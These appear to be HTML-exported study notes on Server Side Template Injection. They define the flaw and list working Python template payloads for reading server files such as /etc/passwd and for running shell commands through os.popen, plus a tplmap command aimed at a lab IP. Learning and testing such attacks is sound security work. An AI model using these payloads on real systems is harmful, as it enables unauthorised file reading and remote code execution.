<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>SSTI</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>SSTI</h1>

      <div class="ck-content">
        <p>Server Side Template Injection, is when a user is able to pass in a parameter
          that can control the template engine that is running on the server</p>
        <figure
        class="image image_resized" style="width:61.17%">
          <img src="SSTI/1_image.png" />
          </figure>
          <figure class="image">
            <img src="SSTI/image.png" />
          </figure>
          <p>This introduces a vulnerability, as it allows a hacker to inject template
            code into the website. The effects of this can be devastating, from XSS,
            all the way to RCE.</p>
          <p><code>{{config}}</code>

          </p>
          <p>Note: Different template engines have different injection payloads, however
            usually you can test for SSTI using {{2+2}} as a test.</p>
          <p><code>{{ ''.__class__.__mro__[2].__subclasses__()[40]()(&lt;file&gt;).read()}} </code>to
            read files on the server. Effectively all that payload does is load the
            file object in python, from there we can use basic file operations. Let's
            try to read /etc/passwd using this method from <a href="https://github.com/swisskyrepo/PayloadsAllTheThings">https://github.com/swisskyrepo/PayloadsAllTheThings</a> </p>
          <p>We can use the code <code>{{config.__class__.__init__.__globals__['os'].popen(&lt;command&gt;).read()}}</code> to
            execute commands on the server. All that payload does is import the os
            module, and run a command using the popen method.</p>
          <p>For automatic SSTI, <a href="https://github.com/epinna/tplmap">https://github.com/epinna/tplmap</a> </p>
          <p><code>./tplmap.py -u 'http://10.10.65.32/' -d 'name' --os-cmd 'ls /'</code>

          </p>
          <p> </p>
          <p> </p>
          <p>
            <br /> </p>
      </div>
    </div>
  </body>

</html>